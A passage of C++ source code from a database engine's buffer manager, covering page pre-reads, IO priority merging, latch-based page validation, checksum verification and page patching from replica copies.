PERFOpt( cBFPagesVersionCopied.Inc( PinstFromIfmp( pbfOrigOld->ifmp ), pbfOrigOld->tce ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cBFVersioned ) );
OSTrace( JET_tracetagBufferManager, OSFormat( "Version Copied: %p (0x%d:%d.%d) to %p (0x%d,%d)\n",
pbfOrigOld,
(ULONG)pbfOrigOld->ifmp, pbfOrigOld->pgno,
(ULONG)(*((CPAGE::PGHDR*)pbfOrigOld->pv)).objidFDP,
(*ppbfNewCurr),
(ULONG)(*ppbfNewCurr)->ifmp, (*ppbfNewCurr)->pgno
) );
ETCacheVersionCopyPage( pbfOrigOld->ifmp, pbfOrigOld->pgno );
return JET_errSuccess;
HandleError:
Assert( err < JET_errSuccess ); // no warnings.
AssertRTL( err > -65536 && err < 65536 );
if ( !fOwnsWrite )
{
pbfOrigOld->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
*ppbfNewCurr = pbfNil;
return err;
}
// Merges the IO priority of the INST and the User. Where the regular flags are merged, but
// since we can only have one Dispatch Priority, the user (if it has a dispatch priority) then
// wins / overwrites the default inst dispatch priority.
OSFILEQOS QosBFIMergeInstUserDispPri( const INST * const pinst, const BFTEMPOSFILEQOS qosIoUserBfTemp )
{
OSFILEQOS qosIoUser = (OSFILEQOS)qosIoUserBfTemp;
const OSFILEQOS qosIoDispatch = qosIoUser & qosIODispatchMask;
if ( qosIoDispatch == 0 )
{
qosIoUser |= qosIODispatchImmediate;
}
Expected( ( ( qosIoUser & qosIODispatchMask ) == qosIODispatchImmediate ) || ( ( qosIoUser & qosIODispatchMask ) == qosIODispatchBackground ) );
const OSFILEQOS qosIoUserDispatch = qosIoUser |
// if user priority exists, masks off dispatch mask ...
( ( qosIoUser & qosIODispatchMask ) ?
( ~qosIODispatchMask & QosSyncDefault( pinst ) ) :
QosSyncDefault( pinst ) );
return qosIoUserDispatch;
}
// Issues a pre-read for the requested pgno.
//
// If fCombine is set the API will reject (with errDiskTilt) any page that can't
// be combined with the already building IO.
ERR ErrBFIPrereadPage( IFMP ifmp, PGNO pgno, const BFPreReadFlags bfprf, const BFPriority bfpri, const TraceContext& tc )
{
ERR err = errBFPageCached;
BFHash::CLock lock;
VOID * pioreqReserved = NULL;
BOOL fBFOwned = fFalse;
PBF pbf = NULL;
if ( !FParentObjectClassSet( tc.nParentObjectClass ) )
{
FireWall( "TcPrereadObjectClassTcNotSet" );
}
// Anything larger than 0x7FFFFFFF will be rejected by the flushmap with
// invalid parameter on latch (and asserted on as we've got good defensive
// code ;).
Expected( pgno <= pgnoSysMax );
Assert( 0 == ( bfprf & bfprfNoIssue ) ); // should be taken care of by outer layers ...
// the IFMP / PGNO was not present in the hash table
if ( !FBFInCache( ifmp, pgno ) )
{
const OSFILEQOS qosIoUserDispatch = QosBFIMergeInstUserDispPri( PinstFromIfmp( ifmp ), QosBFUserAndIoPri( bfpri ) );
const OSFILEQOS qos = qosIoUserDispatch | ( ( bfprf & bfprfCombinableOnly ) ? qosIOOptimizeCombinable : 0 );
//
// Need to do things in a specific order
//
// First alloc the BF (need to do it before allocing the I/O req since
// allocing the BF may involve issuing currently unissued I/O from the
// TLS which can affect whether the I/O req is combinable with existing
// I/O req or not and hence whether it counts against max outstanding
// I/Os or not)
//
// Next alloc the I/O req (need to do it before adding BF to cache since
// allocing the I/O req can fail and we cannot allow a failure after
// adding the BF to the cache since someone may already be waiting for
// it to finish I/O and become unlatched)
//
// Finally add the BF to the cache, note that ErrBFICachePage takes
// ownership of the pre-allocated BF (even in case of failure), so
// make sure to note that
//
Call( ErrBFIAllocPage( &pbf, IcbBFIBufferSize( g_rgfmp[ifmp].CbPage() ), fFalse, fFalse ) );
fBFOwned = fTrue;
err = ErrBFIAsyncPreReserveIOREQ( ifmp, pgno, qos, &pioreqReserved );
CallSx( err, errDiskTilt );
Call( err );
// try to add this page to the cache
// technically this is a write latch, but we will use bfltMax as a sentinel to indicate
// we're pre-reading a page, not latching.
err = ErrBFICachePage( &pbf,
ifmp,
pgno,
fFalse, // fNewPage
fFalse, // fWait
fFalse, // fMRU
PctBFCachePri( bfpri ), // pctCachePriority
tc, // tc
bfltMax, // bfltTraceOnly
( bfprf & bfprfDBScan ) ? bflfDBScan : bflfNone ); // bflfTraceOnly
fBFOwned = fFalse;
Call( err );
// the page was added to the cache - no more failures allowed
// schedule the read of the page image from disk. further preread
// manipulation of the BF will be done in BFIAsyncReadComplete()
TraceContextScope tcPreread( iorpBFPreread );
CallS( ErrBFIAsyncRead( pbf, qos, pioreqReserved, *tcPreread ) );
pioreqReserved = NULL;
// success at touching off pre-read, update stats
PERFOpt( cBFPagesPreread.Inc( PinstFromIfmp( ifmp ), (TCE) tc.nParentObjectClass ) );
Ptls()->threadstats.cPagePreread++;
OSTraceFMP( ifmp, JET_tracetagBufferManager, OSFormat( "Preread page=[0x%x:0x%x]", (ULONG)ifmp, pgno ) );
}
else
{
PERFOpt( cBFPagesPrereadUnnecessary.Inc( PinstFromIfmp( ifmp ), (TCE) tc.nParentObjectClass ) );
}
HandleError:
if ( pioreqReserved != NULL )
{
BFIAsyncReleaseUnusedIOREQ( ifmp, pioreqReserved );
}
if ( fBFOwned )
{
BFIFreePage( pbf, fFalse );
}
return err;
}
INLINE ERR ErrBFIValidatePage( const PBF pbf, const BFLatchType bflt, const CPageEvents cpe, const TraceContext& tc )
{
// we should only see bfltShared, bfltExclusive, and bfltWrite
Assert( bflt == bfltShared || bflt == bfltExclusive || bflt == bfltWrite );
// if this page is not in an error state then return its current error code
ERR errBF;
if ( ( errBF = pbf->err ) >= JET_errSuccess )
{
AssertRTL( errBF > -65536 && errBF < 65536 );
return errBF;
}
if ( bflt != bfltShared )
{
Assert( FBFIUpdatablePage( pbf ) );
}
// perform slow validation on this page
errBF = ErrBFIValidatePageSlowly( pbf, bflt, cpe, tc );
// This bf could've been read as part of a coalesced IO.
// In that case, validate all pages of the coalesced IO for patchable corruptions.
if ( BoolParam( PinstFromIfmp( pbf->ifmp ), JET_paramEnableExternalAutoHealing )
&& PagePatching::FIsPatchableError( errBF )
&& CPageValidationLogEvent::LOG_NONE != cpe )
{
BFIPatchRequestIORange( pbf, cpe, tc );
}
Assert( errBF != errBFIPageNotVerified );
Assert( errBF != errBFIPageRemapNotReVerified );
return errBF;
}
INLINE BOOL FBFIDatabasePage( const PBF pbf )
{
// determines if the page contains
// unstructured data
// UNDONE: only sort pages actually need to be
// excluded, but we currently can't differentiate
// between sort pages and temp. table pages, so
// we need to exclude the temp. database
// altogether
return ( !FFMPIsTempDB( pbf->ifmp ) );
}
// we use this function at a few key places (namely when we write unlatch/dowgrade and
// pre write IO) to check that the pgno is properly set.
LOCAL BOOL FBFIBufferIsZeroed( const PBF pbf ); // fwd decl - temp until pgno validation removed
void BFIValidatePagePgno_( const PBF pbf, PCSTR szFunction )
{
if ( FBFIDatabasePage( pbf ) && !FIsSmallPage() )
{
CPAGE cpage;
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, CbBFIBufferSize( pbf ) );
const PGNO pgnoOnPage = g_fRepair ? cpage.PgnoREPAIRThis() : cpage.PgnoThis();
const PGNO pgnoInBF = pbf->pgno;
if ( pgnoOnPage == 0 || pgnoOnPage != pgnoInBF )
{
// pgno is not valid, deal with repair special case ...
if ( g_fRepair )
{
// in repair pgno can be zero, but can't be mismatched if non-zero
Enforce( pgnoOnPage == 0 || pgnoOnPage == pgnoInBF );
// in repair data we'll allow non-zero, but if zero, data must be all zeros
Enforce( pgnoOnPage != 0 || FBFIBufferIsZeroed( pbf ) );
}
else
{
WCHAR wszEnforceMessage[128];
OSStrCbFormatW( wszEnforceMessage, sizeof(wszEnforceMessage), L"pgnoOnPage(%d) != pgnoInBF(%d) @ %hs", pgnoOnPage, pgnoInBF, szFunction );
PageEnforceSz( cpage, fFalse, L"CachePgnoMismatch", wszEnforceMessage );
}
}
}
}
void BFIValidatePageUsed( const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
}
const ULONG shfUserPriorityTag = 24;
BYTE BUserPriTagOnly( const OSFILEQOS qos )
{
QWORD qw = ( qos >> shfUserPriorityTag );
// There should be no high DWORD qos bits, so the result should be just the user tag.
Assert( ( qw & (QWORD)~0xFF ) == 0 );
Assert( ( ( qosIOUserPriorityTraceMask & qos ) >> shfUserPriorityTag ) == qw );
return (BYTE)qw;
}
JETUNITTEST( BF, BFICheckUserPriorityTagFitsInHighDwordByte )
{
CHECK( UsBits( qosIOUserPriorityTraceMask ) == UsBits( ( qosIOUserPriorityTraceMask >> shfUserPriorityTag ) ) );
}
void BFITrackCacheMissLatency( const PBF pbf, HRT hrtStartWait, const BFTraceCacheMissReason bftcmr, const OSFILEQOS qosIoPriorities, const TraceContext& tc, ERR errTrueIo /* ErrMMIORead() - true page deref */ )
{
const HRT dhrt = HrtHRTCount() - hrtStartWait;
const QWORD usecsWait = ( 1000000 * dhrt ) / HrtHRTFreq();
Assert( bftcmr != bftcmrInvalid );
// update cache miss latency counters
if ( !PinstFromIfmp( pbf->ifmp )->FRecovering() )
{
PERFOpt( cBFCacheMissLatencyTotalTicksAttached.Add( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce, CmsecHRTFromDhrt( dhrt ) ) );
PERFOpt( cBFCacheMissLatencyTotalOperationsAttached.Inc( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce ) );
}
// track cache miss latency thread stats
TLS* ptls = Ptls();
ptls->threadstats.cusecPageCacheMiss += usecsWait;
ptls->threadstats.cPageCacheMiss++;
if ( errTrueIo >= JET_errSuccess && FBFIDatabasePage( pbf ) && ( ( CPAGE::PGHDR * )( pbf->pv ) )->fFlags & CPAGE::fPageLongValue )
{
ptls->threadstats.cusecLongValuePageCacheMiss += usecsWait;
ptls->threadstats.cLongValuePageCacheMiss++;
}
// trace this cache miss latency
GetCurrUserTraceContext getutc;
static_assert( sizeof(bftcmr) == sizeof(BYTE), "Because trace type is as byte" );
ETCacheMissLatency(
pbf->ifmp,
pbf->pgno,
getutc->context.dwUserID,
getutc->context.nOperationID,
getutc->context.nOperationType,
getutc->context.nClientType,
getutc->context.fFlags,
getutc->dwCorrelationID,
tc.iorReason.Iorp(),
tc.iorReason.Iors(),
tc.iorReason.Iort(),
tc.iorReason.Ioru(),
tc.iorReason.Iorf(),
pbf->tce,
usecsWait,
bftcmr,
BUserPriTagOnly( qosIoPriorities ) );
}
ERR ErrBFIValidatePageSlowly( PBF pbf, const BFLatchType bflt, const CPageEvents cpe, const TraceContext& tc )
{
ERR err = errCodeInconsistency;
BOOL fRetryingLatch = fFalse;
TICK tickStartRetryLatch = 0;
BOOL fPageValidated = fFalse; // Doesn't mean page is valid, means that we fully validated the page to the best
// of our abilities (which cannot always be performed under shared latch).
while ( !fPageValidated )
{
ERR errFault = JET_errSuccess;
Assert( err == errCodeInconsistency );
Assert( ( !fRetryingLatch && ( tickStartRetryLatch == 0 ) ) || ( fRetryingLatch && ( tickStartRetryLatch != 0 ) ) );
Assert( FBFIOwnsLatchType( pbf, bflt ) );
// if this page has already been verified then get the result from the page
ERR errBF = pbf->err;
if ( ( errBF != errBFIPageNotVerified ) &&
( errBF != errBFIPageRemapNotReVerified ) )
{
err = ( pbf->bfdf == bfdfClean || errBF >= JET_errSuccess ?
errBF :
JET_errSuccess );
AssertRTL( err > -65536 && err < 65536 );
Assert( errBF != JET_errFileIOBeyondEOF ); // lingering EOFs should never be in the cache.
Assert( !fPageValidated );
fPageValidated = fTrue;
}
// we already have or can acquire the exclusive latch
else if ( bflt != bfltShared ||
pbf->sxwl.ErrUpgradeSharedLatchToExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
const BOOL fReverifyingRemap = ( pbf->err == errBFIPageRemapNotReVerified );
const BOOL fPatchableCodePath =
CPageValidationLogEvent::LOG_NONE != cpe &&
// Cannot mark the page filthy in the reverifying-remap path, so defer patching to next latch attempt
!fReverifyingRemap;
// if the page has still not been verified then verify the page and
// save the result
if ( pbf->err == errBFIPageNotVerified ||
pbf->err == errBFIPageRemapNotReVerified )
{
ERR errValidate = JET_errSuccess;
Assert( FBFIUpdatablePage( pbf ) );
Assert( pbf->icbPage == pbf->icbBuffer );
// if we are mapping views then force a copy-on-write for all pages.
// if that doesn't work then treat it as a disk I/O error
//
// NOTE: we must do this to isolate exceptions that can occur while
// accessing memory mapped files backed by ordinary files. if we
// didn't do this then any code that touches page data could crash
// on an I/O error
//
// NOTE: we used to try and VirtualLock these pages in memory.
// we can't do this anymore because the view cache is being used
// in situations where the cache is configured to hold many views
//
// NOTE: we could use FBFICacheViewCacheDerefIo() but then we are
// passing bfatPageAlloc type pages into ErrMMIORead() which asserts
// that the buffer passed is a mapped file section. So I'm only
// going to do this read for bfatViewMapped here ...
if ( pbf->bfat == bfatViewMapped )
{
Expected( BoolParam( JET_paramEnableViewCache ) ); // currently JET_paramEnableViewCache is global, so this implies it is on.
HRT hrtStart = HrtHRTCount();
// It could be this causes a painful issue, even with our residency check and if so we
// might have to parameterize this as a bit under JET_paramEnableViewCache if we get
// serious number of "AVs" / randomly placed in-page exceptions.
errValidate = g_rgfmp[pbf->ifmp].Pfapi()->ErrMMIORead( OffsetOfPgno( pbf->pgno ), (BYTE*)pbf->pv, CbBFIPageSize( pbf ), IFileAPI::fmmiorfKeepCleanMapped );
BFITrackCacheMissLatency( pbf, hrtStart, bftcmrReasonMapViewRead, 0, tc, errValidate );
Ptls()->threadstats.cPageRead++;
}
// perform page verification
if ( errValidate >= JET_errSuccess )
{
errValidate = ErrBFIVerifyPage( pbf, cpe, fTrue );
}
if ( errValidate < JET_errSuccess )
{
(void)ErrERRCheck( errValidate );
}
pbf->err = SHORT( errValidate );
Assert( pbf->err == errValidate );
if ( FBFIDatabasePage( pbf ) && pbf->err >= JET_errSuccess && fPatchableCodePath && !FNegTest( fStrictIoPerfTesting ) )
{
errFault = ErrFaultInjection( 34788 );
if ( errFault < JET_errSuccess )
{
pbf->err = SHORT( errFault );
Expected( PagePatching::FIsPatchableError( pbf->err ) );
}
}
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// if there was no error while verifying the page and we can rule
// out the existence of any active versions by its dbtime then go
// ahead and reset all versioned state on the page
//
// must exclude pages with unstructured data
//
// NOTE: these updates are being done as if under a WAR Latch
// NOTE: if we are mapping views then do not allow discretionary updates
// While do this only for bfatFracCommit, this could be applied to
// bfatPageAlloc as well, but that'd be pointless because that is only
// used for beyond EOF / new pages - where we don't need cleanup.
if ( pbf->bfat == bfatFracCommit )
{
if ( pbf->err >= JET_errSuccess && FBFIDatabasePage( pbf ) )
{
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, CbBFIBufferSize( pbf ) );
// not RO database and page is definitely old enough or in redo
if ( !g_rgfmp[ pbf->ifmp ].m_fReadOnlyAttach &&
cpage.Dbtime() < g_rgfmp[ pbf->ifmp ].DbtimeOldestGuaranteed() )
{
if ( FNDAnyNodeIsVersioned( cpage ) )
{
NDResetVersionInfo( &cpage );
BFIDirtyPage( pbf, bfdfUntidy, *TraceContextScope() ); // don't care about tracing untidy touches
}
}
cpage.UnloadPage();
}
}
Assert( FBFIUpdatablePage( pbf ) ); // should still hold ...
#ifdef ENABLE_CLEAN_PAGE_OVERWRITE
// we've validate page, it checksums, is the right page, and probably not a lost flush, so now if
// the IO was suspiciously slow we suspect the disk is having trouble with bad blocks at or near
// this this page so we are going to over-write the page (in vain? hopes it helps). But we don't
// do the overwritting here, we just mark it dirty, let scavenge or something write it out. In the
// future we're considering remapping the page to a different page.
if ( pbf->fSuspiciouslySlowRead &&
pbf->err >= JET_errSuccess &&
!g_rgfmp[ pbf->ifmp ].m_fReadOnlyAttach &&
!PinstFromIfmp( pbf->ifmp )->m_fTermInProgress )
{
// Note this is a little risky b/c the page is clean and we will call BFIResetLgposOldestBegin0( pbf )
// which can take locks ... we'll see how this goes under fault injection.
BFIDirtyPage( pbf, bfdfDirty, *TraceContextScope() );
}
#endif
// is the page valid, and full sized ...
if ( pbf->err >= JET_errSuccess &&
pbf->icbBuffer == pbf->icbPage )
{
// try to dehydrate the page
// first we must have the write latch
CSXWLatch::ERR errTryW = CSXWLatch::ERR::errSuccess;
if ( bflt != bfltWrite )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() );
errTryW = pbf->sxwl.ErrTryUpgradeExclusiveLatchToWriteLatch();
}
// if we have the write latch, we can proceed with dehydration
if ( CSXWLatch::ERR::errSuccess == errTryW )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// Do dehydration
BFIDehydratePage( pbf, fTrue );
if ( bflt != bfltWrite )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
}
}
} // if ( /* not verified: */ pbf->err == errBFIPageNotVerified || pbf->err == errBFIPageRemapNotReVerified )
if ( PagePatching::FIsPatchableError( pbf->err ) &&
fPatchableCodePath &&
( errFault < JET_errSuccess || g_rgfmp[pbf->ifmp].Pfapi()->CLogicalCopies() > 1 ) )
{
// try to patch the page from copy
// first we must have the write latch
if ( bflt != bfltWrite &&
pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pbf->sxwl.WaitForWriteLatch();
}
Assert( pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->icbBuffer == pbf->icbPage );
// Do the patch
PagePatching::TryPatchFromCopy( pbf->ifmp, pbf->pgno, pbf->pv, &pbf->err );
// This causes problem when called from FBFICompleteFlushPage since it may already have BFFMP locked
if ( pbf->err >= JET_errSuccess &&
!g_rgfmp[ pbf->ifmp ].m_fReadOnlyAttach )
{
BFIDirtyPage( pbf, bfdfFilthy, *TraceContextScope() );
}
if ( bflt != bfltWrite )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
}
// get the error for this page
err = ( pbf->bfdf == bfdfClean || pbf->err >= JET_errSuccess ?
pbf->err :
JET_errSuccess );
AssertRTL( err > -65536 && err < 65536 );
Assert( !fPageValidated );
fPageValidated = fTrue;
// release the exclusive latch if acquired
if ( bflt == bfltShared )
{
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
}
Assert( FBFIOwnsLatchType( pbf, bflt ) );
}
// we do not have exclusive access to the page
else
{
Assert( !fRetryingLatch || ( tickStartRetryLatch != 0 ) );
if ( fRetryingLatch && ( DtickDelta( tickStartRetryLatch, TickOSTimeCurrent() ) < 1000 ) )
{
// We've already tried this shared latch case and gotten a -1018 / checksum failure. If it's a fixable bit flip, there
// is no point trying again with shared latch, we need to sleep around until we end up in the first if clause that
// the BF got verified by the other thread or we can try get the x-latch ourselves and do a full checksum with ECC-correction.
UtilSleep( dtickFastRetry );
continue;
}
ERR errValidate = JET_errSuccess;
Assert( pbf->icbPage == pbf->icbBuffer );
// if we are mapping views then try to touch the page in memory. if
// that doesn't work then treat it as a disk I/O error
//
// NOTE: we must do this to isolate exceptions that can occur while
// accessing memory mapped files backed by ordinary files. if we
// didn't do this then any code that touches page data could crash
// on an I/O error
//
// UNDONE: ideally, we would also attempt to COW the page into our
// working set as we do if we have the exclusive latch. however,
// we cannot do this because the page might be undergoing latchless I/O
// and thus might be write protected. the chance of the page getting
// paged in, paged out, and paged in again w/ an in page error is pretty
// remote anyway
if ( pbf->bfat == bfatViewMapped )
{
Expected( BoolParam( JET_paramEnableViewCache ) ); // currently JET_paramEnableViewCache is global, so this implies it is on.
errValidate = g_rgfmp[pbf->ifmp].Pfapi()->ErrMMIORead( OffsetOfPgno( pbf->pgno ), (BYTE*)pbf->pv, CbBFIPageSize( pbf ), IFileAPI::fmmiorfKeepCleanMapped );
}
// verify the page without saving the results. we do this so that
// we can validate the page without blocking if someone else is
// currently verifying the page
if ( errValidate >= JET_errSuccess )
{
// Important, fFalse controls event and if we update the page, the
// page may or may not be updatable, so it is important
errValidate = ErrBFIVerifyPage( pbf, CPageValidationLogEvent::LOG_NONE, fFalse );
}
// if there is an error in the page then check the status of the page
// again. there are two possibilities: the page is really bad or the
// page was modified by someone with a WAR Latch
//
// if the page is really bad then it will either be flagged as not
// verified or it will be clean and flagged with the verification
// error. if it is still not verified then we should use our own
// result. if it has been verified then we will use the actual result
//
// if the page was modified by someone with a WAR Latch then we know
// that it was verified at one time so we should just go ahead and
// use the result of that validation
//
// there's also another possibility, which is another thread with a WAR
// latch is about to checksum a page with a fixable error, in which case
// we have just checked the page without error correction enabled so we'll
// incorrectly return that the page is corrupted so we'll hande that case by
// retrying for some amount of time
if ( errValidate < JET_errSuccess )
{
if ( ( errValidate == JET_errReadVerifyFailure ) && !fRetryingLatch )
{
fRetryingLatch = fTrue;
tickStartRetryLatch = TickOSTimeCurrent();
OnDebug( tickStartRetryLatch = ( tickStartRetryLatch == 0 ) ? 1 : tickStartRetryLatch );
continue;
}
errBF = pbf->err;
if ( ( errBF != errBFIPageNotVerified ) &&
( errBF != errBFIPageRemapNotReVerified ) )
{
err = ( pbf->bfdf == bfdfClean || errBF >= JET_errSuccess ?
errBF :
JET_errSuccess );
}
else
{
err = errValidate;
}
AssertRTL( err > -65536 && err < 65536 );
}
else
{
err = errValidate;
}
Assert( !fPageValidated );
fPageValidated = fTrue;
}
}
Assert( fPageValidated );
Assert( err != errCodeInconsistency );
// If validation fails and we are logging events then issue a patch request. It is safe to
// issue multiple requests for the same page so we can call this every time validation fails.
Assert( FBFIOwnsLatchType( pbf, bflt ) );
if ( BoolParam( PinstFromIfmp( pbf->ifmp ), JET_paramEnableExternalAutoHealing )
&& CPageValidationLogEvent::LOG_NONE != cpe
&& PagePatching::FIsPatchableError( err ) )
{
PagePatching::TryToRequestPatch( pbf->ifmp, pbf->pgno );
}
// return the result
return err;
}
// This method doesnt guarantee a patch request on every page in the range because of locking semantics
void BFIPatchRequestIORange( PBF pbf, const CPageEvents cpe, const TraceContext& tc )
{
AssertSz( !g_fRepair, "Page patching should never happen during repair/integrity check." );
Assert( pbf->sxwl.FOwnSharedLatch() || pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
const IFMP ifmp = pbf->ifmp;
const PGNO pgnoTarget = pbf->pgno;
const JET_ERR errTarget = pbf->err;
INT cpgIOSpan = (INT) ( max( UlParam( JET_paramMaxCoalesceReadSize ), UlParam( JET_paramMaxCoalesceWriteSize ) ) / g_rgfmp[ifmp].CbPage() );
Assert( cpgIOSpan > 0 );
if ( cpgIOSpan <= 1 )
{
return;
}
const BOOL fPassive = PinstFromIfmp( ifmp )->m_plog->FRecovering() &&
PinstFromIfmp( ifmp )->m_plog->FRecoveringMode() == fRecoveringRedo;
// we dont really know where the pgnoTarget was relative to a coalesced IO
// so we assume it was both at the end and start and request patches for 2x the max IO size
//
PGNO pgnoBegin = max( pgnoNull + 1, pgnoTarget - cpgIOSpan + 1 );
PGNO pgnoEnd = min( pgnoMax, pgnoTarget + cpgIOSpan );
// make sure we don't over-run past the end of the database
Assert( g_rgfmp[ifmp].PgnoLast() >= pgnoTarget );
pgnoEnd = min( pgnoEnd, g_rgfmp[ifmp].PgnoLast() + 1 );
for ( PGNO pgnoCurr = pgnoBegin; pgnoCurr < pgnoEnd; pgnoCurr++ )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
if ( pgnoCurr == pgnoTarget )
{
continue;
}
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgnoCurr ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
g_bfhash.ReadUnlockKey( &lock );
if ( errHash == BFHash::ERR::errSuccess )
{
if ( FBFITryAcquireExclusiveLatchForMaint( pgnopbf.pbf ) ) // ignore the page if we cant lock it
{
Assert( pgnopbf.pbf->sxwl.FOwnExclusiveLatch() );
// Someone can potentially steal our bf, that means it was evicted. We dont need to validate it
//
if( FBFICurrentPage( pgnopbf.pbf, ifmp, pgnoCurr ) )
{
(void)ErrBFIValidatePageSlowly( pgnopbf.pbf, bfltExclusive, cpe, tc ); // ignore error, we dont want to do anything with it
}
pgnopbf.pbf->sxwl.ReleaseExclusiveLatch();
}
}
// if the page isn't present in the cache and we're in recovery, assume it
// needs patching
//
else
{
Assert( errHash == BFHash::ERR::errEntryNotFound );
// note: We don't do active page patching here because the active
// page patching pipeline we think has limited capability as we
// have to roll a log, and we think the passive consumption of the
// page patch request is singleton at a time.
if ( BoolParam( PinstFromIfmp( ifmp ), JET_paramEnableExternalAutoHealing )
&& CPageValidationLogEvent::LOG_NONE != cpe
&& fPassive // IMPORTANT! See below g_bfhash unlock comment
&& PagePatching::FIsPatchableError( errTarget ) )
{
PagePatching::TryToRequestPatch( ifmp, pgnoCurr );
}
// if we were patching such pages on the active, we would have to unlock the g_bfhash after
// the patch-request is issued to protect from another thread trying to read in and dirty
// the page ...
// _HOWEVER_, since we're page patching only on passives, we can let go of the g_bfhash
// before the page patch request.
}
}
}
ERR ErrBFIVerifyPageSimplyWork( const PBF pbf )
{
BYTE rgBFLocal[sizeof(BF)];
CPAGE::PGHDR2 pghdr2;
void * pvPage = NULL;
// I can't believe this is 10 lines long to ask a very simple question ...
if ( !FBFIDatabasePage( pbf ) )
{
return JET_errSuccess;
}
memcpy( rgBFLocal, pbf, sizeof(BF) ); // 1. copy off the BF struct ...
CPageValidationNullAction nullaction;
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, CbBFIBufferSize( pbf ) );
const ERR err = cpage.ErrValidatePage( pgvfDoNotCheckForLostFlush, &nullaction );
if ( JET_errSuccess != err &&
JET_errPageNotInitialized != err )
{
if ( FIsSmallPage() ) // 2. copy off the page header ...
{
memcpy( &(pghdr2.pghdr), pbf->pv, sizeof(pghdr2.pghdr) );
}
else
{
memcpy( &(pghdr2), pbf->pv, sizeof(pghdr2) );
}
Assert( pbf->icbPage == pbf->icbBuffer );
pvPage = _alloca( CbBFIPageSize( pbf ) ); // 3. now go for the gold,
memcpy( pvPage, pbf->pv, CbBFIPageSize( pbf ) ); // try to copy the page image ...
// finally die here, so we get all this good stuff on the stack ...
EnforceSz( fFalse, OSFormat( "UnexpectedPageValidationFailure:%d", err ) );
// just to make sure pghdr is referenced / not optimized away ...
Assert( pghdr2.pghdr.objidFDP <= 0x7FFFFFFF );
}
// just make sure rgBFLocal is good and referenced too ...
Enforce( ((BF*)rgBFLocal)->ifmp == pbf->ifmp && ((BF*)rgBFLocal)->pgno == pbf->pgno && ((BF*)rgBFLocal)->pv == pbf->pv );
cpage.UnloadPage();
return err;
}
ERR ErrBFIVerifyPage( const PBF pbf, const CPageEvents cpe, const BOOL fFixErrors )
{
ERR err = JET_errSuccess;
CPageEvents cpeActual = cpe;
Assert( pbf->icbPage == pbf->icbBuffer );
// the page contains unstructured data
if ( !FBFIDatabasePage( pbf ) )
{
// the page is verified
return JET_errSuccess;
}
const PGNO pgno = pbf->pgno;
if ( fFixErrors || CPageValidationLogEvent::LOG_NONE != cpe )
{
// In order to fix errors, OR log an event we must be sure we
// have exclusive or better access to the page to keep spurious
// modifications (like resetting version bits)
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
}
else
{
Assert( pbf->sxwl.FOwner() );
}
const LOG * const plog = PinstFromIfmp( pbf->ifmp )->m_plog;
FMP* const pfmp = &g_rgfmp[ pbf->ifmp ];
const BOOL fInRecoveryRedo = ( !plog->FLogDisabled() && ( fRecoveringRedo == plog->FRecoveringMode() ) );
const BOOL fReplayingRequiredRange = fInRecoveryRedo && pfmp->FContainsDataFromFutureLogs();
// compute this page's checksum and pgno
if( CPageValidationLogEvent::LOG_NONE != cpeActual )
{
if( g_fRepair || fInRecoveryRedo )
{
// it is expected for these events to happen during recovery/repair so don't log anything
cpeActual &= ~CPageValidationLogEvent::LOG_UNINIT_PAGE;
}
}
CPageValidationLogEvent validationaction(
pbf->ifmp,
cpeActual,
BUFFER_MANAGER_CATEGORY );
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.LoadPage( pbf->ifmp, pgno, pbf->pv, CbBFIBufferSize( pbf ) );
// Note that we only drop lost flush validation during replaying of the required range if the
// current state on the map came from the persisted map on disk (i.e., if we are rebuilding the
// map). We still run lost flush validation during replaying of the required range if the flush
// state is runtime, i.e., if we've already fixed it up, evicted the page and now we're reading
// it back.
const BOOL fFailOnRuntimeLostFlushOnly = ( ( UlParam( PinstFromIfmp( pbf->ifmp ), JET_paramPersistedLostFlushDetection ) & JET_bitPersistedLostFlushDetectionFailOnRuntimeOnly ) != 0 );
const PAGEValidationFlags pgvf =
( fFixErrors ? pgvfFixErrors : pgvfDefault ) |
( ( cpe & CPageValidationLogEvent::LOG_EXTENSIVE_CHECKS ) ? pgvfExtensiveChecks : pgvfDefault ) | // if we aren't logging events, we don't want to fix any errors
( pbf->err != errBFIPageNotVerified ? pgvfDoNotCheckForLostFlush : pgvfDefault ) |
( fFailOnRuntimeLostFlushOnly ? pgvfFailOnRuntimeLostFlushOnly : pgvfDefault ) |
( fReplayingRequiredRange ? pgvfDoNotCheckForLostFlushIfNotRuntime : pgvfDefault );
err = cpage.ErrValidatePage( pgvf, &validationaction );
// Set the flush state for the page if it passed verification and 1) we are recovering the required range
// (lost flush verification was bypassed above) or 2) the state is currently unknown. Or, if we are replaying
// the required range and the page is uninitialized.
